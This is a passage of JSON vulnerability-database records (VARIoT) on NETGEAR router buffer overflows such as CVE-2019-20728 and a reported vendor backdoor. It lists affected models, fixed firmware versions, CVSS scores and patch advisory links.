"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-61060)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/285356"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115024"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20753"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060629/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-and-modem-routers-psv-2018-0085"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20753"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"date": "2020-04-16T22:15:12.790000",
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"date": "2024-11-21T04:39:16.390000",
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
}
],
"trust": 0.6
}
}
var-202004-0800
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R9000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, it does not correctly verify the data boundary, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0800",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rbr50",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.3.5.30"
},
{
"model": "rbs50",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.3.5.30"
},
{
"model": "rbk50",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.3.5.30"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "rbw30",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.1.2.6"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "dm200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r8900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "jndr3000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dm200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "jndr3000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "rbk50",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2.3.5.30"
},
{
"model": "rbr50",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2.3.5.30"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r7500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "wndr4300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr4500v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wnr2000v5",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "wndr3700v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr4300v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.24"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dm200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:jndr3000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:rbk50_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:rbr50_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
}
]
},
"cve": "CVE-2019-20728",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20728",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015430",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-67656",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20728",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20728",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015430",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20728",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20728",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015430",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-67656",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1339",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R9000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, it does not correctly verify the data boundary, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20728"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNVD",
"id": "CNVD-2021-67656"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20728",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-67656",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"id": "VAR-202004-0800",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
}
],
"trust": 1.131329496931818
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
}
]
},
"last_update_date": "2024-11-23T22:51:27.214000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Buffer Overflow on Some Routers, Gateways, and WiFi Systems, PSV-2017-315",
"trust": 0.8,
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-67656)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/289181"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114877"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20728"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061199/security-advisory-for-post-authentication-buffer-overflow-on-some-routers-gateways-and-wifi-systems-psv-2017-315"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20728"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"date": "2020-04-16T20:15:13.210000",
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-67656"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015430"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1339"
},
{
"date": "2024-11-21T04:39:12.090000",
"db": "NVD",
"id": "CVE-2019-20728"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015430"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1339"
}
],
"trust": 0.6
}
}
var-201312-0602
Vulnerability from variot
Netgear is a well-known manufacturer of network equipment. Its router products are mainly used for enterprises and individual users.
Many routers produced by NetGear have backdoors. The backdoor is the super user and password set by the manufacturer. The attacker can use the backdoor to obtain the root authority of the router in the adjacent network, and then implant the Trojan horse to completely control the user's router. Subsequent dns hijacking attacks can be launched.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
